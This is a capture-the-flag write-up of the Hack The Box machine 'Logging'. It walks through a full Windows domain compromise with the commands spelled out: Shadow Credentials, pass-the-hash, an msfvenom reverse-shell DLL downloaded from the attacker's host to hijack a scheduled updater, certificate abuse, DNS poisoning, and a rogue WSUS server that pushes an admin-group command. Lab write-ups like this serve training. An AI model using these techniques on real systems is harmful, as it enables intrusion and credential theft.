Logging HTB Writeup

I just solved Logging from Hack the Box!

Logging Machine Summary

Logging is a medium-difficulty Windows machine on Hack The Box that focuses on Active Directory enumeration, Kerberos authentication, certificate abuse, application exploitation, and privilege escalation through a rogue Windows Server Update Services (WSUS) infrastructure. The machine demonstrates how exposed log files, insecure Active Directory permissions, certificate-based authentication, and trust in internal update services can be chained together to achieve complete domain compromise.

The attack chain begins with Nmap enumeration, which identifies the target as an Active Directory Domain Controller exposing common domain services including DNS, Kerberos, LDAP, SMB, WinRM, and IIS. After performing host configuration and time synchronization to satisfy Kerberos authentication requirements, SMB share enumeration reveals an accessible Logs share containing several application log files.

Analysis of the downloaded logs uncovers hardcoded LDAP bind credentials belonging to the svc_recovery service account. After validating the credentials, Kerberos authentication is performed by requesting a Ticket Granting Ticket (TGT), followed by BloodHound enumeration of the Active Directory environment. BloodHound analysis reveals that svc_recovery possesses GenericWrite permissions over the msa_health$ machine account, providing a clear privilege escalation path through a Shadow Credentials attack.

Using Certipy, Shadow Credentials are added to the msa_health$ account, allowing certificate-based authentication and retrieval of the machine account's NTLM hash. The hash is then used to authenticate successfully through Evil-WinRM, establishing an initial foothold on the target system.

Following initial access, extensive post-exploitation enumeration is performed to understand the environment. User privileges, installed applications, scheduled tasks, directory structures, application binaries, and monitoring scripts are reviewed to identify potential privilege escalation opportunities. Application log enumeration and analysis reveal that the custom UpdateMonitor service repeatedly attempts to process a missing Settings_Update.zip archive and dynamically load settings_update.dll during scheduled update checks. Scheduled task enumeration confirms that the application executes automatically every few minutes under the jaylee.clifton user account.

Permission enumeration further reveals that authenticated users possess write access to the application's update directory, making the update mechanism vulnerable to DLL hijacking. A malicious DLL is generated using msfvenom, packaged into the expected ZIP archive, and delivered to the monitored directory. Once the scheduled task executes, the rogue DLL is loaded successfully, resulting in remote code execution and a reverse shell as jaylee.clifton. The user flag is subsequently retrieved from the compromised user's Desktop.

After obtaining user-level access, additional user directory enumeration uncovers an exported incident report describing a temporary migration to a staging WSUS server (wsus.logging.htb) alongside details of a continuously running synchronization task. These findings shift the focus toward the domain's internal software update infrastructure.

PowerShell is launched to perform certificate enumeration, where a user certificate is successfully requested using the Active Directory Certificate Services (AD CS) infrastructure. The certificate is exported as a password-protected PFX file, retrieved through Evil-WinRM, and reused locally for certificate-based authentication using Certipy. Active Directory Certificate Services enumeration identifies an enrollable certificate template suitable for abuse, allowing a new certificate to be requested for the staging WSUS server.

Using Kerberos-authenticated DNS management, a malicious DNS record is created that redirects wsus.logging.htb to the attacker's system. After verifying the DNS modification, the WSUS attack environment is prepared by installing and configuring the wsuks framework. A rogue WSUS server is then launched using the previously obtained certificate, allowing the attacker to impersonate the legitimate update server.

The rogue WSUS infrastructure is subsequently configured to deliver a malicious administrative command through the Windows Update mechanism. As the target performs its scheduled update synchronization, it downloads and executes the supplied payload, adding the previously compromised msa_health$ machine account to the local Administrators group.

Finally, administrative access is re-established through Evil-WinRM using the existing machine account credentials. Privilege verification confirms successful membership in the local Administrators group, enabling unrestricted access to the system. A recursive search locates the administrator's root.txt file, and reading the flag completes the machine with full system compromise.

Protected Page

The first step in owning the Logging machine like I have always done in my previous writeups is to connect my Kali Linux terminal with Hack the Box server. To establish this connection, I ran the following command in the terminal:

sudo openvpn logging.ovpn

Once the connection between my Kali Linux terminal and Hack the Box server has been established, I started the Logging machine and I was assigned an IP address (10.129.40.175).

Nmap Enumeration

I began by performing a comprehensive Nmap scan against the target to identify open ports, running services, operating system details, and service versions. This initial enumeration provided a clear picture of the attack surface and immediately suggested that the target was a Windows Active Directory Domain Controller hosting the logging.htb domain.

nmap -sCV -A 10.129.40.175

The scan revealed several Active Directory-related services, including DNS (53), Kerberos (88), LDAP (389/636/3268/3269), SMB (445), RPC (135/593), and WinRM (5985), confirming that the host DC01 was the domain controller for logging.htb. In addition, IIS was running on port 80 with the default Windows Server page, while SMB signing was enforced, indicating that certain relay attacks would not be feasible. This information established the foundation for the next phase of enumeration, focusing on Active Directory and web service reconnaissance.

Host Configuration

After identifying the target as the logging.htb domain controller, I configured my local machine to resolve the domain name correctly. This allowed me to communicate with the target using its fully qualified domain name instead of the IP address, which is essential for many Active Directory services.

echo "10.129.40.175 logging.htb DC01.logging.htb" | sudo tee -a /etc/hosts

By adding both logging.htb and DC01.logging.htb to my /etc/hosts file, I ensured proper name resolution throughout the engagement. With the host configuration complete, I was ready to begin enumerating the domain services and web applications using their expected hostnames.

Time Synchronization

Before interacting with the Active Directory environment, I synchronized my attack machine's clock with the target domain controller. Kerberos authentication is highly sensitive to time differences, so correcting the clock helps prevent authentication failures caused by clock skew.

timedatectl set-ntp off sudo ntpdate 10.129.40.175

I first disabled automatic NTP synchronization and then updated my system time directly from the target. The output confirmed that my clock was adjusted by approximately seven hours, ensuring that subsequent Kerberos-based authentication and domain enumeration would function correctly.

SMB Share Enumeration

Using the provided domain credentials, I authenticated to the Logs SMB share and downloaded every available log file for offline analysis. Log files often contain valuable information such as usernames, service accounts, credentials, or configuration details that can be leveraged for further access.

smbclient //10.129.40.175/Logs -U 'logging.htb\wallace.everette%Welcome2026@' -c 'prompt OFF; mget *'

The authentication was successful, and I retrieved four log files from the share, including Audit_Heartbeat.log, IdentitySync_Trace_20260219.log, Service_State.log, and TaskMonitor.log. These files became the next focus of my enumeration as they potentially contained sensitive operational information that could assist with privilege escalation or lateral movement.

Log File Analysis

After downloading the log files from the SMB share, I began reviewing them to identify sensitive information that could aid further enumeration. The IdentitySync_Trace_20260219.log file immediately stood out because it contained detailed debugging information from an internal identity synchronization service.

cat IdentitySync_Trace_20260219.log

While examining the log, I discovered that the application had logged the LDAP connection context, exposing the service account LOGGING\svc_recovery along with its plaintext password Em3rg3ncyPa$$2025. The log also revealed that the account authenticated against DC01.logging.htb over LDAP, making these credentials an excellent candidate for validating access against the Active Directory domain.

Credential Validation

After recovering the svc_recovery credentials from the log file, I attempted to authenticate to the SMB service to verify whether the account was valid and determine its level of access. This also allowed me to enumerate available SMB shares if the authentication succeeded.

nxc smb 10.129.40.175 -u 'svc_recovery' -p 'Em3rg3ncyPa$$2025' --shares

The server recognized the credentials, but the authentication failed with STATUS_ACCOUNT_RESTRICTION, indicating that the account was valid but restricted from interactive SMB logins. This suggested that svc_recovery was likely a service account, prompting me to test the credentials against other domain services that might permit authentication.

Kerberos Authentication

Since the recovered service account was restricted from authenticating over SMB, I attempted to authenticate directly with Kerberos to verify whether the credentials were still valid. After successfully requesting a Ticket Granting Ticket (TGT), I configured my environment to use the cached Kerberos ticket for subsequent domain enumeration.

impacket-getTGT 'logging.htb/svc_recovery:Em3rg3ncyPa$$2026' -dc-ip 10.129.40.175

export KRB5CCNAME=svc_recovery.ccache

The request completed successfully, and Impacket saved the Kerberos ticket as svc_recovery.ccache. I then exported the KRB5CCNAME environment variable so that Kerberos-aware tools would automatically use the cached ticket for authenticated interactions with the Active Directory domain, eliminating the need to repeatedly supply credentials.

BloodHound Enumeration

With valid domain credentials, I ran BloodHound to enumerate the Active Directory environment and collect information about users, groups, computers, Group Policy Objects, and privilege relationships. This provided a complete dataset for identifying potential attack paths and privilege escalation opportunities.

bloodhound-python -u 'wallace.everette' -p 'Welcome2026@' -d logging.htb -ns 10.129.40.175 -dc DC01.logging.htb -c All --zip

The enumeration completed successfully and discovered one domain, one domain controller, 14 users, 57 groups, 3 Group Policy Objects, and several other Active Directory objects. Finally, BloodHound compressed the collected data into 20260627203526_bloodhound.zip, which I imported into the BloodHound interface to visually analyze privilege relationships and identify the next attack path.

BloodHound Analysis

After importing the BloodHound collection into the interface, I analyzed the relationships between the recovered accounts to identify potential privilege escalation paths. The graph revealed a clear attack chain that was not immediately obvious from standard Active Directory enumeration.

The BloodHound analysis showed that the svc_recovery account possessed GenericWrite permissions over the msa_health$ managed service account. In addition, msa_health$ had CanPSRemote rights on DC01.logging.htb, indicating that it was permitted to establish remote PowerShell sessions to the domain controller. This combination identified a viable privilege escalation path, where gaining control of msa_health$ could ultimately provide remote administrative access to DC01.

Shadow Credentials Attack

After confirming in BloodHound that svc_recovery had GenericWrite permissions over the msa_health$ account, I abused this privilege using Certipy's Shadow Credentials attack. This technique temporarily added a Key Credential to the target account, allowing me to authenticate as msa_health$ without knowing its password.

certipy-ad shadow auto -u "svc_recovery@logging.htb" -account "MSA_HEALTH$" -k -no-pass -target DC01.logging.htb -dc-host 10.129.40.175

The attack completed successfully by adding a temporary Key Credential, obtaining a Kerberos TGT for msa_health$, and extracting its NTLM hash. Certipy then automatically restored the original Key Credentials, leaving the account unchanged while providing me with the NTLM hash 603fc24ee01a9409f83c9d1d701485c5, which I used for the next stage of the attack.

Remote Access with Evil-WinRM

After obtaining the NTLM hash for the msa_health$ managed service account, I authenticated to the target over WinRM using a pass-the-hash attack. Since BloodHound had previously shown that this account had CanPSRemote rights on the domain controller, I expected it to permit remote PowerShell access.

evil-winrm -i 10.129.40.175 -u 'msa_health$' --hash 603fc24ee01a9409f83c9d1d701485c5

The authentication was successful, and Evil-WinRM established a remote PowerShell session as msa_health$ on DC01. This provided me with an interactive shell on the domain controller, allowing me to begin post-exploitation enumeration and search for opportunities to escalate privileges further.

Post-Exploitation Enumeration

After gaining a remote PowerShell session as msa_health$, I enumerated the user's home directory to identify any scripts or files that could reveal how the account was being used. A PowerShell script named monitor.ps1 immediately stood out, so I examined its contents for additional clues.

dir type monitor.ps1

The script was designed to monitor the scheduled task named "UpdateChecker Agent" using the Windows Task Scheduler COM interface and write its status to C:\Share\Logs\TaskMonitor.log. This revealed that the account was responsible for monitoring scheduled tasks and identified both the task name and log location, providing valuable information for the next stage of privilege escalation.

Privilege Enumeration

After establishing a foothold on the domain controller, I enumerated the security context of the msa_health$ account to determine its group memberships and assigned privileges. This helped me understand what actions the account was permitted to perform and identify potential privilege escalation opportunities.

whoami /all

The output confirmed that I was running as the logging\msa_health$ managed service account, which belonged to the Domain Computers and Remote Management Users groups. Although the account had only a few default privileges, the enabled SeMachineAccountPrivilege stood out because it allows the creation of computer accounts in the domain, making it a potential avenue for further Active Directory privilege escalation.

Application Enumeration

After inspecting the monitoring script, I enumerated the installation directory of the application it referenced to better understand its components and dependencies. Examining the application's files could reveal configuration files, third-party libraries, or executables that might be vulnerable or misconfigured.

Get-ChildItem 'C:\Program Files\UpdateMonitor\' -Recurse

The enumeration revealed the main executable UpdateMonitor.exe along with its configuration files and a packages directory containing the System.IO.Compression.ZipFile .NET library. This indicated that the application was a custom .NET program packaged with its dependencies, making UpdateMonitor.exe the primary target for further reverse engineering and analysis in search of privilege escalation opportunities.

Application Log Enumeration

After identifying the application's installation directory, I searched for its runtime data to locate log files that might reveal how the application operated. Application logs often contain execution details, errors, or references to scheduled tasks that can assist with further analysis.

Get-ChildItem 'C:\ProgramData\UpdateMonitor\' -Recurse

The enumeration revealed a dedicated Logs directory containing a single monitor.log file. Since this log was actively updated and significantly larger than the other files, it became the next target for analysis, as it was likely to contain valuable runtime information about the UpdateMonitor application and its scheduled execution.

Application Log Analysis

After locating the application's log file, I examined the most recent entries to understand how the update mechanism operated and identify any weaknesses. Reviewing the latest log entries often reveals missing files, failed components, or execution paths that can be abused.

Get-Content 'C:\ProgramData\UpdateMonitor\Logs\monitor.log' -Tail 20

The log showed that UpdateMonitor periodically checked both a core server and the local system for Settings_Update.zip before attempting to load settings_update.dll from C:\Program Files\UpdateMonitor\bin\. Each execution failed with Error 126, indicating the DLL could not be loaded. This behavior exposed the application's update workflow and suggested that the missing DLL and update package could become the focus of the next privilege escalation step.

Scheduled Task Enumeration

After understanding how the update application operated, I inspected the scheduled task responsible for launching it. Examining the task definition allowed me to determine how frequently it executed, which user account ran it, and the exact command being invoked.

Get-Content 'C:\Windows\System32\Tasks\UpdateChecker Agent'

The task configuration showed that UpdateChecker Agent executed UpdateMonitor.exe every three minutes under the domain user LOGGING\jaylee.clifton. It also revealed the command-line arguments passed to the application (500 /scan=3 /autofix=true), confirming that the update process was automated. This information identified the execution context of the application and provided valuable insight for investigating potential privilege escalation opportunities through the scheduled update mechanism.

Directory Enumeration

After identifying the scheduled task and the executable it launched, I enumerated the application's installation directory to verify its contents and determine whether any additional binaries or configuration files were present. This also helped confirm the location of the executable referenced by the scheduled task.

Get-ChildItem 'C:\Program Files\UpdateMonitor\'

The directory contained the primary executable UpdateMonitor.exe, two configuration files, and the bin and packages directories used by the application. This confirmed that UpdateMonitor.exe was the only executable in the installation path, making it the primary target for further analysis and investigation of the application's update mechanism.

Binary Extraction

After identifying UpdateMonitor.exe as the application executed by the scheduled task, I downloaded a local copy from the target system for offline analysis. Analyzing the binary on my attack machine would allow me to inspect its functionality without interacting directly with the target.

download 'C:\Program Files\UpdateMonitor\UpdateMonitor.exe' /tmp/UpdateMonitor.exe

The download completed successfully, and the executable was saved to my local machine. With a copy of the binary available, I proceeded to reverse engineer it to better understand the update mechanism and identify any vulnerabilities that could be leveraged for privilege escalation.

Application Log Review

After downloading the binary, I reviewed the complete application log to better understand the update process and determine whether the observed behavior was consistent over time. Analyzing the full log helped me identify how the application searched for updates and where the process repeatedly failed.

Get-Content 'C:\ProgramData\UpdateMonitor\Logs\monitor.log'

The log confirmed that the scheduled task executed every three minutes and consistently searched for Settings_Update.zip on both a core server and the local system before attempting to load settings_update.dll from C:\Program Files\UpdateMonitor\bin\. Every execution failed with Error 126, indicating that the DLL was missing or could not be loaded. This repeated failure exposed a predictable update workflow, making the application's DLL loading mechanism the primary focus for the next privilege escalation step.

Permission Enumeration

After understanding how the update process worked, I checked the permissions on the application's data directory to determine whether my current account could modify any files used during the update routine. Writable directories used by privileged applications are often a valuable privilege escalation vector.

icacls "C:\ProgramData\UpdateMonitor"

The ACLs showed that while SYSTEM and Administrators had full control, the BUILTIN\Users group also had Write Data, Append Data, and Write Extended Attributes permissions. Since the update process searched this directory for Settings_Update.zip, these permissions suggested that a low-privileged user could place files in the update location, making the application's update mechanism a promising target for further exploitation.

Payload Preparation

After discovering that the update process searched for Settings_Update.zip and attempted to load settings_update.dll, I prepared a replacement DLL for the application's update mechanism. I then packaged the DLL into a ZIP archive using the expected filename so it would match the format referenced by the update process.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.28 LPORT=4444 -a x86 --platform windows -f dll -o settings_update.dll

zip Settings_Update.zip settings_update.dll

The first command generated a Windows DLL containing the chosen payload, while the second compressed it into Settings_Update.zip, matching the filename expected by the application's update routine. With the archive prepared, I was ready to test whether the automated update mechanism would process the package during its next scheduled execution.

Gaining Code Execution

After preparing the update package, I started a Netcat listener to receive an incoming connection and hosted the ZIP archive on a temporary HTTP server. From my existing Evil-WinRM session, I downloaded the update package into the location monitored by the application's update process.

nc -lvnp 4444

python -m http.server 80

On the Evil-WinRM shell, I ran the command:

(New-Object System.Net.WebClient).DownloadFile("http://10.10.15.28/Settings_Update.zip","C:\ProgramData\UpdateMonitor\Settings_Update.zip")

A few moments later, the scheduled UpdateChecker Agent detected the newly uploaded archive, processed the update, and established a reverse shell back to my Netcat listener. The connection returned an interactive Windows command prompt from the target system, confirming successful code execution through the application's automated update mechanism.

User Flag

After receiving the reverse shell, I verified the security context of the compromised process to determine which account the scheduled update mechanism was running under. Once I confirmed the user context, I navigated to the user's Desktop and retrieved the user flag.

whoami cd ../../Users/jaylee.clifton/Desktop dir type user.txt

The whoami command confirmed that the reverse shell was executing as logging\jaylee.clifton, the same account configured to run the UpdateChecker Agent scheduled task. I then navigated to the user's Desktop, verified that user.txt was present, and displayed its contents, successfully obtaining the user flag and confirming user-level access on the target system.

User Directory Enumeration

After obtaining the user flag, I continued enumerating the compromised user's profile to search for additional artifacts that could assist with privilege escalation. I navigated through the Documents directory and discovered a folder named Tickets, which appeared to contain support or administrative documentation.

cd ../Documents dir cd Tickets dir

Inside the Tickets directory, I found a single HTML file named Incident_4922_WSUS_Remediation_ViewExport.html. Based on its name, the file appeared to be an exported incident report related to WSUS remediation, making it a promising source of information for identifying administrative procedures or misconfigurations that could lead to further privilege escalation.

Incident Report Analysis

After discovering the exported support ticket, I examined its contents to identify any operational details that could reveal additional attack vectors. Administrative documentation often contains internal hostnames, scheduled tasks, or infrastructure changes that are not exposed through standard enumeration.

type Incident_4922_WSUS_Remediation_ViewExport.html

The incident report revealed that the administrator had temporarily configured the system to use the staging WSUS server at wsus.logging.htb because of issues with the production update infrastructure. It also disclosed the existence of a scheduled ForceSync task running every 120 seconds to reset the Windows Update components. These findings pointed to a custom WSUS deployment and an automated synchronization process, providing valuable clues for the next stage of privilege escalation.

Host Configuration

After discovering the internal WSUS hostname in the incident report, I updated my local hosts file so my attack machine could resolve it correctly. This ensured that any tools or browsers referencing the WSUS server would connect to the target using its expected hostname.

echo "10.129.40.175 wsus.logging.htb" | sudo tee -a /etc/hosts

By mapping wsus.logging.htb to the target IP address, I enabled proper hostname resolution for the staging WSUS server described in the support ticket. With the host configuration complete, I was ready to begin enumerating the WSUS service and investigate whether it could be leveraged for privilege escalation.

PowerShell Session

Before continuing with the WSUS investigation, I verified the default command interpreter available to my current session and switched from the Command Prompt to Windows PowerShell. PowerShell provides more powerful cmdlets and is better suited for system administration and Active Directory enumeration.

echo %COMSPEC% powershell

The %COMSPEC% environment variable confirmed that the default shell was C:\Windows\System32\cmd.exe. I then launched a PowerShell session successfully, giving me access to native PowerShell cmdlets and a more flexible environment for the remaining stages of post-exploitation and privilege escalation.

Certificate Enumeration

After switching to PowerShell, I began enumerating the current user's certificate store to determine whether I could request or use client certificates for authentication. I also prepared a secure password that would later be used to protect an exported certificate.

Get-ChildItem Cert:\CurrentUser Get-ChildItem Cert:\CurrentUser\My $cert = Get-Certificate -Template User -CertStoreLocation Cert:\CurrentUser\My $pwd = ConvertTo-SecureString "Boltech@123" -AsPlainText -Force

The enumeration showed the available certificate stores, while the personal (My) store was initially empty. I then requested a new certificate using the User certificate template and stored the resulting certificate object in the $cert variable. Finally, I created a secure string containing the export password, which would be used when exporting the certificate for later authentication.

Certificate Export

After successfully requesting a user certificate, I created a temporary directory to store it and exported the certificate in PFX format. Exporting the certificate with its private key allowed me to reuse it later for certificate-based authentication.

mkdir C:\tmp Export-PfxCertificate -Cert $cert.Certificate -FilePath C:\tmp\jaylee.pfx -Password $pwd dir C:\tmp\jaylee.pfx

The export completed successfully, creating the file C:\tmp\jaylee.pfx in the temporary directory. I then verified that the file existed, confirming that the certificate and its associated private key had been exported correctly and were ready for use in the next stage of the attack.

Certificate Retrieval

After exporting the user certificate to the temporary directory, I switched back to my Evil-WinRM session to retrieve a copy onto my attack machine. Downloading the certificate locally allowed me to use it for certificate-based authentication outside the target environment.

cd C:\tmp dir download jaylee.pfx

I verified that jaylee.pfx was present in the temporary directory before downloading it through Evil-WinRM. The transfer completed successfully, giving me a local copy of the exported certificate and private key for use in the next stage of the privilege escalation process.

Certificate-Based Authentication

After downloading the exported certificate, I authenticated to the Active Directory domain using certificate-based authentication with Certipy. This allowed me to obtain Kerberos credentials for the compromised user without relying on a password.

certipy-ad auth -pfx jaylee.pfx -password Boltech@123 -dc-ip 10.129.40.175

The authentication completed successfully, confirming that the certificate belonged to jaylee.clifton@logging.htb. Certipy obtained a Kerberos TGT, saved it as jaylee.clifton.ccache, and recovered the user's NTLM hash. With both the Kerberos ticket and NTLM hash available, I had multiple authentication options for the remaining stages of the attack.

Active Directory Certificate Services Enumeration

After authenticating as jaylee.clifton, I configured my Kerberos ticket and enumerated the Active Directory Certificate Services (AD CS) environment using Certipy. This allowed me to identify available Certificate Authorities, enabled certificate templates, and any potential certificate-based privilege escalation paths.

export KRB5CCNAME=jaylee.clifton.ccache

certipy-ad find -k -dc-ip 10.129.40.175 -target DC01.logging.htb -stdout

The enumeration revealed a single Enterprise CA (logging-DC01-CA) with several enabled certificate templates. Among the results, I identified that the Machine template was enrollable by Domain Computers and marked as a potential ESC2/ESC3 target, indicating a possible path for certificate abuse. This information helped narrow the attack surface and guided the next phase of privilege escalation through Active Directory Certificate Services.

AD CS Certificate Request

After identifying an enrollable certificate template, I requested a certificate from the Enterprise CA using the UpdateSrv template. I specified the wsus.logging.htb hostname as both the UPN and DNS name, then converted the issued certificate into PEM format for compatibility with other authentication tools.

certipy-ad req -k -dc-ip 10.129.40.175 -target DC01.logging.htb -ca logging-DC01-CA -template UpdateSrv -upn wsus.logging.htb -dns wsus.logging.htb

openssl pkcs12 -in wsus.logging.htb_wsus.pfx -out wsus.logging.htb_wsus.pem -nodes --passin pass:

The certificate request completed successfully, producing a PFX file containing both the certificate and private key. I then converted it into PEM format, preparing it for the next stage of the attack where it would be used to authenticate as the WSUS service.

DNS Record Manipulation

After obtaining Kerberos authentication as jaylee.clifton, I used the Kerberos ticket to add a new DNS record for the wsus hostname. This redirected wsus.logging.htb to my attack machine, allowing me to intercept future connections intended for the staging WSUS server.

bloodyAD -d logging.htb \ -u jaylee.clifton \ --host DC01.logging.htb \ --dc-ip 10.129.40.175 \ -k ccache=./jaylee.clifton.ccache \ add dnsRecord wsus 10.10.15.28

ls -l jaylee.clifton.ccache

The command completed successfully, confirming that the wsus DNS record had been created and now resolved to my attacker IP address. I also verified that the Kerberos credential cache was present and available for authentication. With DNS successfully redirected, I was positioned to capture and service connections destined for wsus.logging.htb during the next phase of the attack.

DNS Record Verification

After creating the malicious DNS record, I verified that the change had been successfully applied in Active Directory. Confirming the record ensured that any requests for wsus.logging.htb would now resolve to my attacker-controlled system.

bloodyAD -d logging.htb \ -u jaylee.clifton \ --host DC01.logging.htb \ --dc-ip 10.129.40.175 \ -k ccache=./jaylee.clifton.ccache \ get dnsDump | grep -i wsus

bloodyAD -d logging.htb \ -u jaylee.clifton \ --host DC01.logging.htb \ --dc-ip 10.129.40.175 \ -k ccache=./jaylee.clifton.ccache \ get dnsDump | grep -A5 -i wsus

The output confirmed that wsus.logging.htb had been successfully added to the DNS zone and now resolved to my VPN IP address (10.10.15.28). Verifying the record ensured that subsequent connections to the WSUS server would be redirected to my machine, allowing me to intercept and interact with the target's update traffic during the next stage of the attack.

WSUS Server Setup

After redirecting the WSUS hostname to my attacker machine, I installed the wsuks tool and verified that it had been added to my local environment. I then attempted to start the rogue WSUS server using the certificate I had previously obtained.

pipx install wsuks

which wsuks

sudo wsuks \ -t 10.129.40.175 \ --tls-cert wsus.logging.htb_wsus.pem \ --serve

The installation completed successfully, and which wsuks confirmed that the binary was installed under my local user directory. However, the final command failed with sudo: wsuks: command not found because sudo did not inherit my user's PATH, preventing it from locating the executable. This indicated that I needed to either execute wsuks using its full path or preserve my environment before continuing with the rogue WSUS server setup.

WSUS Environment Preparation

After discovering that sudo could not locate the wsuks executable, I reinstalled the tool with access to the system site packages to resolve the dependency issue. I then verified that the required Python modules were available before proceeding with the rogue WSUS server setup.

pipx uninstall wsuks

pipx install wsuks --system-site-packages

/home/boltech/.local/share/pipx/venvs/wsuks/bin/python -c "import nftables; print('ok')"

The reinstallation completed successfully, and the Python verification script returned ok, confirming that the required nftables dependency was available inside the wsuks virtual environment. With the installation issue resolved, my environment was fully prepared to launch the rogue WSUS server in the next stage of the attack.

Rogue WSUS Server

After preparing my environment and obtaining a valid certificate for the WSUS server, I launched the rogue WSUS service to impersonate the legitimate update server. This allowed me to intercept update requests from the target and serve a malicious update payload.

sudo /home/boltech/.local/bin/wsuks \ -t 10.129.40.175 \ --tls-cert wsus.logging.htb_wsus.pem \ --serve

The WSUS server started successfully, generated a temporary local administrator account that would be deployed to the target, and began listening over HTTPS on port 8531 using the supplied TLS certificate. It also prepared a malicious update package (KB2990974) for delivery, confirming that my rogue WSUS infrastructure was ready to service incoming update requests from the compromised host.

WSUS Command Execution

After confirming that the rogue WSUS server was operational, I restarted it with a custom command that would execute when the target retrieved the malicious update. I configured the server to deliver the payload while listening on my VPN interface and waited for the scheduled WSUS client to connect.

sudo /home/boltech/.local/bin/wsuks \ -t 10.129.40.175 \ --tls-cert wsus.logging.htb_wsus.pem \ --serve-only \ -c '/accepteula /s cmd.exe /c "net localgroup administrators msa_health$ /add"' \ -I tun0

The server started successfully and began serving the malicious update over HTTPS. Shortly afterwards, I observed multiple WSUS client requests, including synchronization, configuration, and update download operations, confirming that the target had connected to my rogue WSUS server. The repeated requests for PsExec64.exe demonstrated that the update workflow was being executed, indicating that my supplied command had been delivered through the spoofed WSUS infrastructure.

Administrative Access

After the rogue WSUS server delivered the command successfully, I reconnected to the target using the previously recovered NTLM hash for the msa_health$ account. This allowed me to verify whether the account had been successfully added to the local Administrators group.

evil-winrm -i 10.129.40.175 -u 'msa_health$' -H 603fc24ee01a9409f83c9d1d701485c5

The WinRM authentication completed successfully, and I obtained another interactive PowerShell session as msa_health$. Since the WSUS-delivered command had already modified the account's local group membership, this new session now reflected the elevated privileges, providing the administrative access required to continue with the final stage of privilege escalation.

Privilege Verification

After reconnecting to the target, I verified that the WSUS-delivered command had completed successfully by checking the membership of the local Administrators group. This confirmed whether the msa_health$ account had received administrative privileges on the system.

net localgroup administrators

The output showed that msa_health$ had been added to the local Administrators group alongside the built-in Administrator, Domain Admins, and Enterprise Admins. This confirmed that the privilege escalation had succeeded, granting my compromised service account full administrative access to the target and paving the way for obtaining the root flag.

Root Flag Enumeration

After confirming that my account had administrative privileges, I searched the entire C: drive for the root flag. Rather than manually browsing user profiles, I recursively enumerated the filesystem to quickly locate every instance of root.txt.

Get-ChildItem -Path C:\ -Filter root.txt -Recurse -Force -ErrorAction SilentlyContinue

The search successfully located root.txt on toby.brynleigh's Desktop, confirming that I now had sufficient privileges to access the administrator's profile. With the flag's location identified, the final step was simply to read its contents and complete the machine.

Root Flag

After locating the administrator's Desktop, I accessed the root.txt file to verify that the privilege escalation was successful. Reading the flag confirmed that I had achieved full administrative control over the target system.

type C:\Users\toby.brynleigh\Desktop\root.txt

The command displayed the contents of root.txt, confirming successful retrieval of the root flag. With both the user and root flags collected, I had successfully completed the machine by chaining Active Directory misconfigurations, application abuse, and a rogue WSUS update process to obtain full system compromise.

Keywords:

Logging HTB Walkthrough

HTB Logging - HackTheBox Season 10 Machine Complete Walkthrough User & Root Flag

DC01.logging.htb

wsus.logging.htb

Hack The Box - Season 10 HTB Logging Writeup - Medium

Logging CTF Walkthroughs

logging htb writeup

Logging Writeup - HackTheBox

Nimbus HTB - Complete Writeup

HTB: Logging - Full Writeup (Season 10)

HTB-Logging

HackTheBox - Logging Season 10 HTB Machine Complete Walkthrough

logging hack the box write up

Logging Machine | HackTheBox

Logging htb-writeup

logging hack the box walkthrough

HTB :: Logging - Writeup

Logging HTB Machine Walkthrough

Mastering Logging: Beginner's Guide from Hack The Box

I just solved Logging from Hack the Box

Pwned Logging from Hack the Box

Hack the Box (HTB) machines Logging walkthrough Season 10

Rooted Logging from Hack the Box

HTB-Logging Season 10 Machine User & Root Flag Solution

Owned Logging from Hack the Box

Enigma HTB Writeup

enigma.htb

Engima htb walkthrough

Enigma Hack the Box Walkthrough

Hack the Box (HTB) machines Enigma walkthrough Season 10

Enigma Hack the Box Write Up

HackTheBox - Enigma Easy Linux

logging-htb · GitHub

Enigma CTF Walkthroughs

Enigma - HackTheBox Season 11 HTB Machine Walkthrough

I just solved Enigma from Hack the Box

Rooted Enigma from Hack the Box

HTB-Nimbus

Owned Enigma from Hack the Box

Hack The Box | Logging

Pwned Enigma from Hack the Box

Enigma | Hack The Box Complete Season 11 HTB Walkthrough

enigma htb machine user flag

enigma hack the box season 11 machine root flag

Logging WriteUp - HackTheBox

Reactor HackTheBox Walkthrough

Checkpoint HackTheBox Walkthrough

Nimbus HackTheBox Walkthrough

Connected HackTheBox Walkthrough

Helix HackTheBox Walkthrough